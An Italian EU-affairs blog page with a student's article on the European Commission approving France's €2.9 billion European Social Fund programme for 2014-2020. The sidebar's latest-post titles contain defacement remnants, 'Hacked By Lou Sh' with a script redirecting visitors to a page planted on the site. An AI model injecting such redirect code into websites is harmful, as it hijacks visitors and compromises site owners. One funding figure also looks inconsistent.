EUROSBLOGS
--> Giugno 2013 Maggio 2013 Aprile 2013 Marzo 2013 Febbraio 2013 Gennaio 2013
Dicembre 2012 Novembre 2012 Ottobre 2012 Settembre 2012 Agosto 2012 Luglio 2012 Giugno 2012 Maggio 2012 Aprile 2012 Marzo 2012 February 2012 Gennaio 2012
Dicembre 2011 Novembre 2011 Ottobre 2011 Settembre 2011 Agosto 2011 Luglio 2011 Giugno 2011 Maggio 2011 Aprile 2011 Marzo 2011 Febbraio 2011 Gennaio 2011
Dicembre 2010 Novembre 2010 Ottobre 2010 Settembre 2010 Luglio 2010 Giugno 2010 Aprile 2010 Marzo 2010 Febbraio 2010
Aggiungere un commento

FSE: €2,9mld per l’occupazione in Francia




La Commissione approva il programma operativo francese

A distanza di due mesi dall’accordo di partenariato tra la Commissione europea e la Francia per definire la migliore strategia per l’utilizzo dei fondi europei, lo scorso 10 ottobre la Commissione europea ha approvato il programma operativo francese per l’attuazione del Fondo sociale europeo (FSE) nella Francia continentale per il periodo 2014-2020.

Il fondo sociale europeo (FSE) ha un ruolo decisivo nel supportare gli investimenti degli Stati membri per ciò che riguarda il capitale umano e aiuta a sostenere la competizione economica europea. Assiste ogni anno 15 milioni di persone per sostenerle nelle loro competenze, per aiutarle ad integrarsi nel mondo del lavoro, per lottare contro l’esclusione sociale e la povertà e per migliorare l’efficacia delle amministrazioni pubbliche.

La Francia incasserà 2.9 miliardi di euro dal FSE per poter migliorare il settore occupazionale, la formazione professionale, l’inclusione sociale e diminuire l’abbandono scolastico. Il programma nazionale sarà integrato con altri 22 programmi regionali francesi e 8 programmi dipartimentali e nelle regioni d’oltremare. In totale i finanziamenti stanziati dal FSE a favore della Francia saranno 6 miliardi di euro, di cui 620 milioni verranno utilizzati per finanziare l’occupazione giovanile e per il programma nazionale per l’assistenza tecnica.

JPEG - 1.8 Kb

Ma quali sono le priorità a cui ottemperare nell’immediato? In primis i finanziamenti saranno utilizzati per soggetti disoccupati, inattivi e per i Neet: 454 milioni di euro saranno utilizzati per rafforzare la mobilità professionale, per sviluppare l’imprenditorialità e per diminuire l’abbandono scolastico.

Circa 707 milioni di euro saranno invece utilizzati per garantire un’adeguata carriera professionale, per pianificare nuovi posti di lavoro, per formare quei lavoratori che sono poco qualificati, per le donne e gli anziani, per la formazione dei lavoratori in esubero e per aiutare le imprese a garantire le pari opportunità e una equa retribuzione.

1.6 milioni di euro verranno spesi per ridurre la povertà e favorire l’inclusione sociale e saranno pertanto destinati alle autorità locali.

JPEG - 5.4 Kb

Nelle parole del Commissario per l’occupazione, gli affari sociali e l’inclusione, László Andor: "Mi congratulo vivamente con le autorità francesi per il loro lavoro e la loro eccellente collaborazione, consentendo la rapida adozione di questo programma operativo del FSE per il periodo 2014-2020. L’FSE contribuirà così a correggere gli squilibri strutturali del mercato del lavoro e a fornire un sostegno alle misure per ridurre la povertà".



Nessun commento
ds Aggiungere un commento

Autori

Vanessa Piacenti
Studentessa del corso di laurea triennale in Scienze della comunicazione, Università si Roma Tor Vergata.



Dialogo con i cittadini sul Futuro dell’Europa

L’Eurosblog è media partner dell’iniziativa "Dialogo con i cittadini sul Futuro dell’Europa" organizzata dalla Rappresentanza in Italia della Commissione europea. Una serie di dibattiti aperti tra la Commissione europea e i cittadini sui temi dell’occupazione, della protezione dei cittadini e della sostenibilità. L’obiettivo è rispondere insieme alla domanda: “Che Europa vogliamo nel futuro?”. Guarda il video viral e fai la tua domanda su Twitter, utilizzando l’hashtag #EUdeb8. Segui l’evento in streaming su http://webcast.ec.europa.eu/eutv/po...

Quale Europa vogliamo nel futuro?


Ultimo commento

Erasmus+: il nuovo programma di studio per i giovani in Europa
di réduction toysrus, le 21 agosto 2013

Nice article :). I’ve studied abroad in Espagna y eso fue una experiencia unica: tanto al nivel laboral como humano! Je recommande ça à tout le monde :)


comitato



Ultimi articoli del blog

<!DOCTYPE HTML>      <head>         <meta charset= Hacked By Lou Sh If you are not redirected automatically, follow the link to example " title=" Hacked By Lou Sh If you are not redirected automatically, follow the link to example " src="local/cache-gd2/cc82855323b3141664fde5d9afad6d5c.png">
window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" (...)
15 marzo 2015
<!DOCTYPE HTML>      <head>         <meta charset= Hacked By Lou Sh If you are not redirected automatically, follow the link to example " title=" Hacked By Lou Sh If you are not redirected automatically, follow the link to example " src="local/cache-gd2/646bc521095d5a61646327c7b727a862.jpg">
window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" (...)
17 febbraio 2015

© Groupe Euros du Village 2010 | Note legali | Sito realizzato con SPIP | Relizzazione tecnica e design : Media Animation & Euros du Village France